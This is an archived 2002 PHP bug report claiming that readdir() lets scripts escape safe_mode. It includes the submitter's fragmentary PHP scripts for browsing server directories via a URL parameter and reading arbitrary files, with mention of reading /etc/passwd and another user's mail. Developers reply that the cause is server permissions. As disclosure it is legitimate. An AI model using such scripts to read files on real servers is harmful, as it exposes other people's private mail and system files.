|  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #15185 Exploring the server recources witch php
Submitted: 2002-01-23 14:26 UTC Modified: 2002-05-03 00:00 UTC
From: koval at kocham dot cie dot gov dot pl Assigned:
Status: No Feedback Package: *Directory/Filesystem functions
PHP Version: 4.0.6 OS: Slackware
Private report: No CVE-ID: None
Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If this is not your bug, you can add a comment by following this link.
If this is your bug, but you forgot your password, you can retrieve your password here.
Bug Type:
From: koval at kocham dot cie dot gov dot pl
New email:
PHP Version: OS:


 [2002-01-23 14:26 UTC] koval at kocham dot cie dot gov dot pl
I've found a possible bug in php 4.06. using simple function readdir(); I coul explore about 90 % of server including /var/spool/mail /ect/passwd e.t.c.

I've wrote simple script that let me to move through all directories:

if ($dir=="")
function getDirList ($dirName) {
print("<h1>Index of: $dirName</h1><hr>");
		$d = dir($dirName);
		while($entry = $d->read()) {
			if ($entry != "." && $entry != "..")
				if (is_dir($dirName."/".$entry))
					array_push($dirs, "$dirName/$entry");
					array_push($files, "$entry");
					array_push($dirfiles, "$dirName");
while ($tmp<$dirn)
	print("<a href='?dir=$dirs[$tmp]'>$dirs[$tmp]</a><br>");
while ($tmp<$filen)
	print("<a href='?dir=$dirfiles[$tmp]'>$dirfiles[$tmp]</a>/<a href='$dirfiles[$tmp]/$files[$tmp]'>$files[$tmp]</a><br>");
if ($dirName!=".")
	print("<hr><button OnClick='javascript:history.back();'>Back");

Default directory is '.' (Your home directory), but if you load this page with parameter dir=/ ( ex. ) You will probably access main folder on your unix server.
I wrote second script that let me read the files not in my home directory:

function readtxt ($path)
$Plik=fopen($path, "r");
flock($Plik, 1);
  $Linia = fgets($Plik, 2);
    if ($Linia=="\n")
flock($Plik, 3);
readtxt ($file);

By typing, for example i could read disco_dzik's mail.

Simple, but serious...

Both of scripts wold not move You outside your home directory if the server would be two machines (first one for system, and the second one just fore home directories) - it's obvious, but I've checked it ;)

Scripts were wroten for my use only, so some of the variables are named in polish - sorry for that ;)
This is a serious bug that needs to be fixed !


Add a Patch

Pull Requests

Add a Pull Request


AllCommentsChangesGit/SVN commitsRelated reports
 [2002-01-23 14:54 UTC]
not a php issue

php runs with the same permissions as the user
the webserver runs under, so if this user has
permission to see the whole server filesystem
php will have that, too

run your wesserver as a low-privileged user
and give it read permission to the absolute
minimum of the filesystem 

or have a look at
 [2002-01-23 16:52 UTC]
Actually this is a dupe of MY bug report. PHP has a bug with readdir(). safe_mode does not limit readdir:

someone bogusified it. Wasn't me. And yes, I tested it on 4.1.0.

Kind Regards,
  Daniel Lorch
 [2002-01-23 17:13 UTC]
Daniel, please stop saying readdir() here.  readdir() should not have any safe-mode checks anymore than fgets() should.  It simply makes no sense.  opendir() is where the safe-mode check should be applied.
 [2002-04-02 13:49 UTC]
I'm pretty sure this has been fixed now. Can you try 4.2.0RC1 from ?
 [2002-05-03 00:00 UTC] php-bugs at lists dot php dot net
No feedback was provided for this bug for over a month, so it is
being suspended automatically. If you are able to provide the
information that was originally requested, please do so and change
the status of the bug back to "Open".
PHP Copyright © 2001-2021 The PHP Group
All rights reserved.
Last updated: Thu Oct 21 09:03:34 2021 UTC